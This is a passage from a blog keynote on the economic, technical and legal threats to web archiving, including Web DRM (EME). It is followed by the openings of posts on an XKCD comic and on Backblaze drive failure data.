Archive is by far the biggest Web archive, for example holding around 40 times as much data as the UK Web Archive. But the smaller archives contain pages it lacks, and there is <a href="https://netpreserveblog.wordpress.com/2016/01/08/memento-help-us-route-uri-lookups-to-the-right-archives/">little overlap between them</a>, showing the value of curation.<br /><br />The second development is Memento (<a href="https://tools.ietf.org/rfc/rfc7089.txt">RFC7089</a>), a Web protocol that allows access facilities such as <a href="http://oldweb.today/">oldweb.today</a> to treat the set of compliant Web archives as if it were one big archive. oldweb.today aggregates many Web archives, pulling each Web resource a page needs from the archive with the copy closest in time to the requested date.<sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote14">[14]</a></sup><br /><h3>The future of Web preservation</h3>There are two main threats to the future of Web preservation, one economic and the other a combination of technological and legal.<br /><h4>The economic threat</h4>Preserving the Web and other digital content for posterity is primarily an <a href="http://blog.dshr.org/2007/06/petabyte-for-century.html">economic problem</a>. With an <a href="http://blog.dshr.org/2011/09/modeling-economics-of-long-term-storage.html">unlimited budget collection and preservation isn't a problem</a>. The reason we're collecting and preserving <a href="http://blog.dshr.org/2014/03/the-half-empty-archive.html">less than half the classic Web</a> of quasi-static linked documents is that <a href="http://blog.dshr.org/2017/03/the-amnesiac-civilization-part-2.html">no-one has the money</a> to do much better. The other half is more difficult and thus more expensive. Collecting and preserving the whole of the classic Web would need the current global Web archiving budget to be roughly tripled, perhaps an additional $50M/yr.<br /><br />Then there are the much higher costs involved in preserving the much more than half of the dynamic <a href="http://blog.dshr.org/2017/03/the-amnesiac-civilization-part-3.html">"Web 2.0" we currently miss</a>.<br /><br /><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-27stcjYS3zk/WYCwX18gFuI/AAAAAAAAD0M/NKJHNRGii7wfqSxKle4FmwzPrSAyW_10gCEwYBhgL/s1600/graph2.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="480" data-original-width="640" height="150" src="https://1.bp.blogspot.com/-27stcjYS3zk/WYCwX18gFuI/AAAAAAAAD0M/NKJHNRGii7wfqSxKle4FmwzPrSAyW_10gCEwYBhgL/s200/graph2.png" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">British Library real income</td></tr></tbody></table>If we are to continue to preserve even as much of society's memory as we currently do we face two very difficult choices; either find a lot more money, or radically reduce the cost per site of preservation.<br /><br />It will be hard to find a lot more money in a world where libraries and archive budgets are <i>decreasing</i>. For example, the graph shows that the British Library's income has declined by 45% in real terms over the last decade.<sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote2">[2]</a></sup><br /><br />The Internet Archive is already big enough to reap economies of scale, and it already uses <a href="http://www.digitalpreservation.gov/meetings/documents/ndiipp13/Kris.pdf">innovative engineering to minimize cost</a>. But Leetaru and others criticize it for:<br /><ul><li>Inadequate metadata to support access and research.</li><li>Lack of quality assurance leading to incomplete collection of sites.</li><li>Failure to collect every version of a site.</li></ul>Generating good metadata and doing good QA are hard to automate and thus the first two are expensive. But the third is simply impossible.<br /><h4>The technological/legal threat</h4>The economic problems of archiving the Web stem from its two business models, advertising and subscription:<br /><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-KF9IyPjrVD0/Wc6Bw_GK9sI/AAAAAAAAD6U/nMEuvvpjJ6oGD99v6jNZ-mvMLcdi9BZdACLcBGAs/s1600/cnn-weather-reload-diff-imgs.gif" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="400" data-original-width="640" height="125" src="https://4.bp.blogspot.com/-KF9IyPjrVD0/Wc6Bw_GK9sI/AAAAAAAAD6U/nMEuvvpjJ6oGD99v6jNZ-mvMLcdi9BZdACLcBGAs/s200/cnn-weather-reload-diff-imgs.gif" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Note weather in GIF of reloads of<br /><a href="http://web.archive.org/web/20130724144801/http://www.cnn.com/">CNN page from Wayback Machine</a><sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote17">[17]</a></sup></td></tr></tbody></table><ul><li>To maximize the effectiveness of advertising, the Web now potentially delivers different content on every visit to a site. What does it mean to "archive" something that changes every time you look at it?</li><li>To maximize the effectiveness of subscriptions, the Web now potentially prevents copying content and thus archiving it. How can you "archive" something you can't copy?</li></ul>Personalization, geolocation and adaptation to browsers and devices mean that each of the about <a href="https://en.wikipedia.org/wiki/List_of_countries_by_number_of_Internet_users">3.4*10<sup>9</sup> Internet users</a> may see different content from each of about 200 countries they may be in, and from each of the say 100 device and browser combinations they may use. Storing <a href="http://blog.dshr.org/2017/03/the-amnesiac-civilization-part-3.html">every possible version of a single average Web page</a> could thus require downloading about 160 exabytes, 8000 times as much Web data as the Internet Archive holds.<br /><br /><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-XrNPtq8066Q/V6z0GEfCTEI/AAAAAAAADFk/kC_Y-1vg-GUGMrGpWgW5k1I5BuXvSWFAQCPcBGAYYCw/s1600/ad-networks.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="900" data-original-width="1600" height="112" src="https://2.bp.blogspot.com/-XrNPtq8066Q/V6z0GEfCTEI/AAAAAAAADFk/kC_Y-1vg-GUGMrGpWgW5k1I5BuXvSWFAQCPcBGAYYCw/s200/ad-networks.jpg" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="http://idlewords.com/talks/what_happens_next_will_amaze_you.htm">Source</a><sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote16">[16]</a></sup></td></tr></tbody></table>The situation is even worse. <a href="http://idlewords.com/talks/what_happens_next_will_amaze_you.htm">Ads are inserted by a real-time auction system</a>, so even if the page content is the same on every visit, the ads differ. Future scholars, like current scholars studying <a href="https://www.nytimes.com/2017/09/06/technology/facebook-russian-political-ads.html">Russian use</a> of <a href="https://www.nytimes.com/2017/10/09/technology/google-russian-ads.html">social media</a> in the 2016 US election, will want to study the ads but they won't have been systematically collected, unlike <a href="https://blog.archive.org/2016/01/22/political-tv-ad-archive-launches-today/">political ads on TV</a>.<sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote21">[21]</a></sup><br /><br />The point here is that, no matter how much resource is available, <i>knowing that an archive has collected all, or even a representative sample, of the versions of a Web page is completely impractical.</i> This isn't to say that trying to do a better job of collecting <i>some</i> versions of a page is pointless, but it is never going to provide future researchers with the certainty they crave. And doing a better job of each page will be expensive.<br /><br />Although it is possible to collect <i>some</i> versions of today's dynamic Web pages, it is likely soon to become impossible to collect <i>any</i> version of most Web pages. Against unprecedented opposition, Netflix and other large content owners with subscription or pay-per-view business models have forced W3C, the standards body for the Web, to <a href="https://arstechnica.com/gadgets/2017/09/drm-for-html5-published-as-a-w3c-recommendation-after-58-4-approval/">mandate that browsers support Encrypted Media Extensions (EME)</a> or Digital Rights Management (DRM) for the Web.<sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote15">[15]</a></sup><br /><br /><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-2FRjhPFGUag/WMmAHEbjTAI/AAAAAAAADro/zqmSZTRUnPwBKJDxb4FzimekcfbN_CB0ACLcB/s1600/W3C-EME-1.png" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="139" src="https://2.bp.blogspot.com/-2FRjhPFGUag/WMmAHEbjTAI/AAAAAAAADro/zqmSZTRUnPwBKJDxb4FzimekcfbN_CB0ACLcB/s200/W3C-EME-1.png" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="https://www.w3.org/TR/encrypted-media/stack_overview.svg">EME data flows</a></td></tr></tbody></table>The W3C's diagram of the EME stack shows an example of how it works. An application, i.e. a Web page, requests the browser to render some encrypted content. It is delivered, in this case from a Content Distribution Network (CDN), to the browser. The browser needs a license to decrypt it, which it obtains from the application via the EME API by creating an appropriate session then using it to request the license. It hands the content and the license to a Content Decryption Module (CDM), which can decrypt the content using a key in the license and render it.<br /><br />What is DRM trying to achieve? Ostensibly, it is trying to ensure that each time DRM-ed content is rendered, specific permission is obtained from the content owner. In order to ensure that, the CDM cannot trust the browser it is running in. For example, it must be sure that the browser can see neither the decrypted content nor the key. If it could see, and save for future use, either it would defeat the purpose of DRM. The license server will not be available to the archive's future users, so preserving the encrypted content without the license is pointless.<br /><br />Content owners are not stupid. They realized early on that the search for uncrackable DRM was a fool's errand<sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote22">[22]</a></sup>. So, to deter reverse engineering, they arranged for the 1998 Digital Millenium Copyright Act (<a href="https://web.archive.org/web/20070609221838/http://www.eff.org/IP/DMCA/">DMCA</a>) to make any attempt to circumvent protections on digital content a criminal offense. US trade negotiations mean that almost all countries (except Israel) have DMCA-like laws.<sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote23">[23]</a></sup><br /><br />Thus we see that the real goal of EME is to ensure that, absent special legislation such as a few national libraries have, anyone trying to either capture the decrypted content, or preserve the license for future use, would be committing a crime. Even though the British Library, among others, has the legal right to capture the decrypted content, it is doubtful that they have the technical or financial resources to do so at scale.<br /><br />Scale is what libraries and archives would need. Clearly, EME will be rapidly adopted for streaming video sites, not just Netflix but YouTube, Vimeo and so on. Even a decade ago, to <a href="http://blog.dshr.org/2007/10/whos-looking-after-snowman.html">study US elections you needed YouTube video</a>, but it will no longer be possible to preserve Web video.<br /><br />But that's not the big impact that EME will have on society's memory. It is intended for video and audio, but it will be hard for W3C to argue that other valuable content doesn't deserve the same protection, for example academic journals. DRM will spread to other forms of content. The business models for Web content are of two kinds, and both are struggling:<br /><ul><li><b>Paywalled content</b>. It turns out that, apart from movies and academic publishing, only a very few premium brands such as <a href="https://www.economist.com/"><i>The Economist</i></a>, the <a href="https://www.wsj.com/"><i>Wall Street Journal</i></a> and the <a href="https://www.nytimes.com/"><i>New York Times</i></a> have viable subscription business models based on (mostly) paywalled content. Even excellent journalism such as <a href="https://www.theguardian.com/"><i>The Guardian</i></a> is reduced to free access, advertising and voluntary donations. Part of the reason is that Googling the headline of paywalled news stories often finds open access versions of the content. Clearly, newspapers and academic publishers would love to use Web DRM to ensure that their content could be accessed only from their site, not via Google or <a href="http://blog.dshr.org/2016/03/elsevier-and-streisand-effect.html">Sci-Hub</a>.</li><li><b>Advertising-supported content</b>. The market for Web advertising is so competitive and <a href="http://adage.com/article/digital/business-insider-york-times-shed-details-ad-industry-s-biggest-problem/311081/">fraud-ridden</a> that Web sites have been forced into letting advertisers run <a href="http://blog.dshr.org/2016/08/ok-im-really-amazed.html">ads that are so obnoxious </a>and indeed riddled with malware, and to load up their <a href="http://blog.dshr.org/2016/11/open-access-and-surveillance.html">sites with trackers</a>, that many users have rebelled.<sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote24">[24]</a></sup> They use ad-blockers; these days it is pretty much essential to do so to <a href="http://www.ccs.neu.edu/home/arshad/publications/ndss2017jslibs.pdf">keep yourself safe</a> and to reduce <a href="http://ieee-security.org/TC/SPW2015/W2SP/papers/W2SP_2015_submission_32.pdf">bandwidth consumption</a>. Not to mention that sites such as Showtime are so desperate for income that their <a href="https://www.bleepingcomputer.com/news/security/showtime-websites-used-to-mine-monero-unclear-if-hack-or-an-experiment/">ads mine cryptocurrency in your browser</a>. Sites are very worried about the loss of income from blocked ads. Some, such as Forbes, refuse to supply content to browsers that block ads (which, in Forbes case, turned out to be a public service; the <a href="http://www.networkworld.com/article/3021113/security/forbes-malware-ad-blocker-advertisements.html">ads carried malware</a>). DRM-ing a site's content will prevent ads being blocked. Thus ad space on DRM-ed sites will be more profitable, and sell for higher prices, than space on sites where ads can be blocked. The pressure on advertising-supported sites, which include both free and subscription news sites, to DRM their content will be intense.</li></ul>Thus the advertising-supported bulk of what we think of as the Web, and the paywalled resources such as news sites that future scholars will need will become un-archivable.<br /><h3>Summary</h3>I wish I could end this talk on an optimistic note, but I can't. The information the future will need about the world of today is on the Web. Our ability to collect and preserve it has been both inadequate and decreasing. This is primarily due to massive under-funding. A few tens of millions of dollars per year worldwide set against the trillions of dollars per year of revenue the Web generates. There is no realistic prospect of massively increasing the funding for Web archiving. The funding for the world's memory institutions, whose job it is to remember the past, has been under sustained attack for many years.<br /><br />The largest component of the cost of Web archiving is the initial collection. The evolution of the Web from a set of static, hyper-linked documents to a JavaScript programming environment has been steadily raising the difficulty and thus cost of collecting the typical Web page. The increasingly dynamic nature of the resulting Web content means that each individual visit is less and less representative of "the page". What does it mean to "preserve" something that is different every time you look at it?<br /><br />And now, with the advent of Web DRM, our likely future is one in which it is not simply increasingly difficult, expensive and less useful to collect Web pages, but actually illegal to do so.<br /><h3>Call To Action</h3>So I will end with a call to action. Please:<br /><ul><li><b>Use the Wayback Machine's <a href="https://archive.org/web/">Save Page Now</a></b> facility to preserve pages you think are important.</li><li><b>Support the work of the <a href="https://archive.org/donate/">Internet Archive</a></b> by donating money and materials.</li><li><b>Make sure your national library is preserving your nation's Web presence.</b></li><li><b>Push back against any attempt by W3C to extend Web DRM.</b></li></ul><h3>Footnotes</h3><ol><li id="Footnote1"> For details, see <a href="https://www.worldcat.org/title/chemistry-and-chemical-technology-part-1-paper-and-printing/oclc/489827792">volume 5 part 1</a> of <a href="https://en.wikipedia.org/wiki/Joseph_Needham" title="Joseph Needham">Joseph Needham</a>'s <i><a href="https://en.wikipedia.org/wiki/Science_and_Civilisation_in_China" title="Science and Civilisation in China">Science and Civilisation in China</a></i>.</li><li id="Footnote2">The nominal income data was obtained from the British Library's <a href="https://www.bl.uk/aboutus/annrep/index.html"><i>Annual Report</i></a> series. The real income was computed from it using <a href="http://www.bankofengland.co.uk/education/Pages/resources/inflationtools/calculator/default.aspx">the Bank of England's official inflation calculator</a>. More on this, including the data for the graph, is <a href="http://blog.dshr.org/2017/08/preservation-is-not-technical-problem.html">here</a>.</li><li id="Footnote3">The BBC report on their <a href="http://www.bbc.com/news/magazine-37861457">nomination of Mao Kobayashi</a> as one of their "100 Women 2016" includes: <blockquote>In Japan, people rarely talk about cancer. You usually only hear about someone's battle with the disease when they either beat it or die from it, but 34-year-old newsreader Mao Kobayashi decided to break the mould with a blog - now the most popular in the country - about her illness and how it has changed her perspective on life. </blockquote>It is noteworthy that, unlike the BBC, Dr. Kao doesn't link to <a href="http://ameblo.jp/maokobayashi0721/">Mao Kobayashi's blog</a>, nor does she link to Stanford's preserved copy. Fortunately, the Internet Archive started <a href="https://web.archive.org/web/*/http://ameblo.jp/maokobayashi0721/">collecting Kobayashi's blog</a> in September 2016.</li><li id="Footnote4">Note that both links in this quote have rotted. I replaced them with links to the preserved copies in the <a href="https://www.archive.org/web/">Internet Archive's Wayback Machine</a>. </li><li id="Footnote5">More on this and related research can be found <a href="http://blog.dshr.org/2016/12/reference-rot-is-worse-than-you-think.html">here</a> and <a href="http://blog.dshr.org/2008/12/persistence-of-poor-peer-reviewing.html">here</a>.</li><li id="Footnote6">Compare the Wayback Machine's capture of the Leave campaign's website&nbsp; <a href="https://web.archive.org/web/20160620214900/http://www.voteleavetakecontrol.org/">three days before the referendum</a> with the <a href="https://web.archive.org/web/20160901000000*/http://www.voteleavetakecontrol.org/">day after</a> (still featuring the battle bus with the £350 million claim) and <a href="https://web.archive.org/web/20160823134359/http://www.voteleavetakecontrol.org/">nine weeks later</a> (without the battle bus). This scrubbing of inconvenient history is a <a href="https://www.theguardian.com/politics/2013/nov/13/conservative-party-archive-speeches-internet">habit with UK Conservatives</a>:<br /><blockquote class="tr_bq">The <a href="https://www.theguardian.com/politics/conservatives">Conservatives</a> have removed a decade of speeches from their website and from the main internet library – including one in which David Cameron claimed that being able to search the web would democratise politics by making "more information available to more people".<br /><br />The party has removed the archive from its public website, erasing records of speeches and press releases from 2000 until May 2010. The effect will be to remove any speeches and articles during the Tories' modernisation period, including its commitment to spend the same as a Labour government.<br />...<br />In a remarkable step the party has also blocked access to the Internet Archive's <a class="u-underline" data-link-name="in body link" href="http://web.archive.org/web/20130628160358/http://www.conservatives.com/" title="Wayback Archive">Wayback Machine</a>, a US-based library that captures webpages for future generations, using a <a href="http://www.conservatives.com/robots.txt">software robot </a>that directs search engines not to access the pages.</blockquote></li><li id="Footnote7">Wikipedia has a comprehensive article on the <a href="https://en.wikipedia.org/wiki/Mission_Accomplished_speech">"Mission Accomplished" speech</a>. A quick-thinking reporter's <i>copying</i> of an on-line court docket <a href="http://blog.dshr.org/2010/10/future-of-federal-depository-libraries.html">revealed more history rewriting</a> in the aftermath of the 2008 financial collapse. Another example of how the Wayback Machine exposed more of the Federal government's Winston Smith-ing is <a href="http://blog.dshr.org/2013/08/winston-smith-lives.html">here</a>.</li><li id="Footnote8">The quote is the abstract to a BBC World Series programme entitled <a href="http://www.bbc.co.uk/programmes/p031zp5y"><i>Restoring a Lost Web Domain</i></a>.</li><li id="Footnote9">To discuss the reliability requirements for long-term storage, I've been using "A Petabyte for a Century" as a <a href="http://blog.dshr.org/search?q=Petabyte+century&amp;max-results=20&amp;by-date=true">theme on my blog since 2007</a>. It led to a <a href="http://www.bl.uk/ipres2008/presentations_day2/43_Rosenthal.pdf">paper at iPRES 2008</a> and an <a href="http://queue.acm.org/detail.cfm?id=1866298">article for <i>ACM Queue</i></a> entitled <i>Keeping Bits Safe: How Hard Can It Be?</i> which subsequently appeared in <a href="http://dx.doi.org/10.1145/1839676.1839692"><i>Communications of the ACM</i></a>, triggering some <a href="http://blog.dshr.org/2011/10/acm-copyrights.html">interesting observations on copyright</a>.</li><li id="Footnote10">I have been <a href="http://blog.dshr.org/search/label/storage%20costs">blogging about the costs of long-term storage</a> with the theme "<a href="http://blog.dshr.org/2012/10/storage-will-be-lot-less-free-than-it.html">Storage Will Be Much Less Free Than It Used To Be</a>" since at least 2010. The graph is from a <a href="http://blog.dshr.org/2017/08/economic-model-of-long-term-storage.html">simplified version of the economic model</a> of long-term storage initially described in <a href="http://www.lockss.org/locksswp/wp-content/uploads/2012/09/unesco2012.pdf">this 2012 paper</a>. For a detailed discussion of technologies for long-term storage see <a href="http://blog.dshr.org/2016/12/the-medium-term-prospects-for-long-term.html"><i>The Medium-Term Prospects For Long-Term Storage Systems</i></a>.</li><li id="Footnote11">The <a href="http://www.macleans.ca/news/canada/vanishing-canada-why-were-all-losers-in-ottawas-war-on-data/">McLeans article continues</a>:<blockquote>The need for such efforts has taken on new urgency since 2014, says Li, when some 1,500 websites were centralized into one, with more than 60 per cent of content shed. Now that reporting has switched from print to digital only, government information can be altered or deleted without notice, she says. (One example: In October 2012, the word “environment” disappeared entirely from the section of the Transport Canada website discussing the Navigable Waters Protection Act.)</blockquote></li><li id="Footnote12"><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-0umLIVnmDhk/WamP0WgO5_I/AAAAAAAAD3s/ENnimgVHZdkO_AkIVbJef8NO-sxBOCdnACLcBGAs/s1600/SejongSillok.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="461" data-original-width="591" height="155" src="https://3.bp.blogspot.com/-0umLIVnmDhk/WamP0WgO5_I/AAAAAAAAD3s/ENnimgVHZdkO_AkIVbJef8NO-sxBOCdnACLcBGAs/s200/SejongSillok.jpg" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="http://www.unesco.org/webworld/nominations/images/korea/6b.jpg">Source</a></td></tr></tbody></table>The nova was recorded in the <i>Joseonwangjosillok</i>, the <a href="https://en.wikipedia.org/wiki/Veritable_Records_of_the_Joseon_Dynasty#Compilation"><i>Annals of the Joseon Dynasty</i></a>. Multiple copies were printed on paper, stored in multiple, carefully designed, geographically diverse archives, and faithfully tended according to a specific process of regular audit, the details of which were carefully recorded each time. Copies lost in war were re-created. I blogged about the <a href="http://blog.dshr.org/2017/09/long-lived-scientific-observations.html">truly impressive preservation techniques that have kept them legible for almost 6 centuries</a>.</li><li id="Footnote13">Estimating what proportion of the Web is preserved is a hard problem. The numerator, the content of the world's Web archives, is fairly easy to measure. But the denominator, the size of the whole Web, is extremely hard to measure. I discuss some attempts <a href="http://blog.dshr.org/2014/03/the-half-empty-archive.html">here</a>. </li><li id="Footnote14">Ilya Kreymer details the operation of <a href="http://oldweb.today/">oldweb.today</a> in a <a href="http://blog.dshr.org/2016/01/guest-post-ilya-kreymer-on-oldwebtoday.html">guest post on my blog</a>.</li><li id="Footnote15">For all the gory details on the problems EME poses for archives, the security of Web browsers, and many other areas, see <a href="http://blog.dshr.org/2017/03/the-amnesiac-civilization-part-4.html"><i>The Amnesiac Civilization: Part 4</i></a>. </li><li id="Footnote16">The image is a slide from a talk by the amazing Maciej Cegłowski entitled <a href="http://idlewords.com/talks/what_happens_next_will_amaze_you.htm"><i>What Happens Next Will Amaze You</i></a>, and it will. Cory Doctorow <a href="https://boingboing.net/2015/10/05/botwars-vs-ad-tech-the-origin.html">calls Cegłowski's talks "barn-burning"</a>, and he's right.</li><li id="Footnote17">This GIF is an animation of a series of reloads of a preserved version of <a href="http://web.archive.org/web/20130724144801/http://www.cnn.com/">CNN's home page from 27 July 2013</a>. Nothing is coming from the live Web, all the different weather images are the result of a single collection by the Wayback Machine's crawler. GIF and information courtesy of Michael Nelson. </li><li id="Footnote18">See also this excellent brief video from Arquivo.pt, the Portuguese Web Archive, <a href="https://youtu.be/YVqFey7hVJc">explaining Web archiving for the general public</a>. It is in Portuguese but with English subtitles.</li><li id="Footnote19">"hundreds of billions" is guesswork on my part. I don't know any plausible estimates of the investment in Web content. In <a href="https://youtu.be/YVqFey7hVJc">this video</a>, Daniel Gomes claims that Arquivo.pt estimated that the value of the content it preserves is €216B, but the methodology used is not given. Their estimate seems high, Portugal's 2016 GDP was €185B.</li><li id="Footnote20">In <a href="https://doi.org/10.1145/3041656"><i>Comparing the Archival Rate of Arabic, English, Danish, and Korean Language Web Pages</i></a> Lulwah Alkwai, Michael Nelson and Michelle Weigle report that in their sample of Web pages:<br /><blockquote>English has a higher archiving rate than Arabic, with 72.04% archived. However, Arabic has a higher archiving rate than Danish and Korean, with 53.36% of Arabic URIs archived, followed by Danish and Korean with 35.89% and 32.81% archived, respectively. </blockquote>Their Table 31 also reveals some problems with the quality of Korean Web page archiving.<br /><table border="2" cellpadding="5" cellspacing="0"><tbody><tr><td align="center" colspan="3">Table XXXI. Top 10 Archived Korean URI-Rs</td></tr><tr><td>Korean URI-Rs</td><td>Memento Count</td><td>Category</td></tr><tr><td>doumi.hosting.bora.net/infomail/error/message04.html</td><td>54,339</td><td>Error page</td></tr><tr><td>joins.com</td><td>17,096</td><td>News</td></tr><tr><td>html.giantsoft.co.kr/404.html</td><td>17,046</td><td>Error page</td></tr><tr><td>errdoc.gabia.net/403.html</td><td>16,414</td><td>Error page</td></tr><tr><td>daum.net</td><td>14,305</td><td>Search engine</td></tr><tr><td>img.kbs.co.kr/pageerror</td><td>13,042</td><td>Error page</td></tr><tr><td>hani.co.kr/oops.html</td><td>12,676</td><td>Error page</td></tr><tr><td>chosun.com</td><td>9,839</td><td>Newspaper</td></tr><tr><td>donga.com</td><td>9,587</td><td>News</td></tr><tr><td>hankooki.com</td><td>7,762</td><td>Search engine</td></tr></tbody></table>5 of the top 10 most frequently archived Korean URIs in their sample are what are called <a href="http://blog.dshr.org/2015/02/the-evanescent-web.html">"soft 404s"</a>, pages that should return <a href="https://en.wikipedia.org/wiki/List_of_HTTP_status_codes">"404 Not Found"</a> but instead return <a href="https://en.wikipedia.org/wiki/List_of_HTTP_status_codes">"200 OK"</a>. </li><li id="Footnote21">Senators have <a href="https://www.theverge.com/2017/10/19/16502946/facebook-twitter-russia-honest-ads-act">introduced a bill</a>:<br /><blockquote>the Honest Ads Act, would require companies like Facebook and Google to keep copies of political ads and make them publicly available. Under the act, the companies would also be required to release information on who those ads were targeted to, as well as information on the buyer and the rates charged for the ads. </blockquote></li><li id="Footnote22">Based on <a href="https://arstechnica.com/gaming/2017/10/denuvos-drm-ins-now-being-cracked-within-hours-of-release/">reporting by Kyle Orland at <i>Ars Technica</i></a>, <a href="https://boingboing.net/2017/10/19/denuvo.html">Cory Doctorow writes</a>:<br /><blockquote>Denuvo is billed as the video game industry's "best in class" DRM, charging games publishers a premium to prevent people from playing their games without paying for them. In years gone by, Denuvo DRM would remain intact for as long as a month before cracks were widely disseminated.<br /><br />But the latest crop of Denuvo-restricted games were all publicly cracked within 24 hours.<br /><br />It's almost as though hiding secrets in code you give to your adversary was a fool's errand.</blockquote></li><li id="Footnote23">Notably, Portugal's new law on DRM contains several useful features including a broad exemption from anti-circumvention for libraries and archives, and a ban on applying DRM to public-domain or government-financed documents. For details, see the <a href="https://www.eff.org/deeplinks/2017/10/portugal-bans-use-drm-limit-access-public-domain-works">EFF's Deeplinks blog</a>.</li><li id="Footnote24">Some idea of the level of fraud in Web advertising can be gained from an <a href="http://adage.com/article/digital/business-insider-york-times-shed-details-ad-industry-s-biggest-problem/311081/">experiment by <i>Business Insider</i></a>:<br /><blockquote>a Business Insider advertiser thought they had purchased $40,000 worth of ad inventory through the open exchanges when in reality, the publication only saw $97, indicating the rest of the money went to fraud.<br /><br />"There was more people saying they were selling Business Insider inventory then we could ever possibly imagine," ... "We believe there were 10 to 30 million impressions of Business Insider, for sale, every 15 minutes."<br /><br />To put the numbers in perspective, Business Insider says it sees 10 million to 25 million impressions a day.</blockquote></li><li id="Footnote25">Last Thursday's example was New York's <a href="https://www.nytimes.com/2017/11/02/nyregion/dnainfo-gothamist-shutting-down.html"><i>Gothamist</i> and <i>DNAinfo</i> local news sites</a>:<br /><blockquote>A week ago, reporters and editors in the combined newsroom of <a href="https://www.dnainfo.com/new-york/">DNAinfo</a> and <a href="http://gothamist.com/">Gothamist</a>, two of New York City’s leading digital purveyors of local news, celebrated victory in their <a href="https://www.nytimes.com/2017/10/27/nyregion/dnainfo-gothamist-union.html">vote to join a union</a>.<br /><br />On Thursday, they lost their jobs, as Joe Ricketts, the billionaire founder of TD Ameritrade who owned the sites, shut them down.</blockquote><a href="https://www.huffingtonpost.com/entry/dnainfo-gothamist-shut-down_us_59fb891be4b0b0c7fa39122e">Twitter was unhappy</a>:<br /><blockquote>The unannounced closure prompted wide backlash from other members of the media on Twitter, with many pointing out that neither writers whose work was published on the sites nor readers can access their articles any longer. </blockquote>The Internet Archive has <a href="https://web.archive.org/web/*/http://gothamist.com/">collected Gothamist since 2003</a>; it has many but not all of the articles. By Saturday, <a href="https://www.nytimes.com/2017/11/03/opinion/dnainfo-gothamist-ricketts-union.html?_r=0">Joe Ricketts thought better of the takedown</a>; the sites were back up. But for how long? See also <a href="http://www.clickhole.com/article/we-employees-clickholecom-have-voted-unanimously-d-6952">here</a>.</li></ol><h3>Acknowledgements</h3>I'm grateful to Herbert van de Sompel and Michael Nelson for constructive comments on drafts, and to Cliff Lynch, Michael Buckland and the participants in <a href="https://www.ischool.berkeley.edu/events/ias">UC Berkeley's Information Access Seminar</a>, who provided useful feedback on a rehearsal of this talk. That isn't to say they agree with it.<br /><br />David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com1tag:blogger.com,1999:blog-4503292949532760618.post-42025870903495862082017-11-01T08:00:00.000-07:002017-11-01T08:00:10.535-07:00Randall Munroe Says It All<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://imgs.xkcd.com/comics/digital_resource_lifespan.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="497" data-original-width="697" height="142" src="https://imgs.xkcd.com/comics/digital_resource_lifespan.png" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">The <a href="https://xkcd.com/1909/">latest XKCD</a> is a succinct summation of the situation, especially the mouse-over.</td></tr></tbody></table>David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com1tag:blogger.com,1999:blog-4503292949532760618.post-87391092812843561052017-10-31T08:00:00.004-07:002017-10-31T08:00:03.644-07:00Storage Failures In The FieldIt's past time for another look at the invaluable <a href="https://www.backblaze.com/blog/hard-drive-failure-rates-q3-2017/">hard drive data that Backblaze puts out quarterly</a>. As Peter Bright notes at <i>Ars Technica</i>, despite being based on limited data, the current stats <a href="https://arstechnica.com/gadgets/2017/10/big-hard-disks-may-be-breaking-the-bathtub-curve/">reveal two interesting observations</a>: <br /><ul><li>Backblaze is seeing reduced rates of infant mortality for the 10TB and 12TB drive generations:<br /><blockquote>The initial data from the 10TB and 12TB disks, however, has not shown that pattern. While the data so far is very limited, with 1,240 disks and 14,220 aggregate drive days accumulated so far, none of these disks (both Seagate models) have failed.</blockquote></li><li>Backblaze is seeing no reliability advantage from enterprise as against consumer drives:<br /><blockquote>the company has now accumulated 3.7 million drive days for the consumer disks and 1.4 million for the enterprise ones. Over this usage, the annualized failure rates are 1.1 percent for the consumer disks and 1.2 percent for the enterprise ones. </blockquote></li></ul>Below the fold, some commentary.<br /><br /><a name='more'></a>The first thing to note 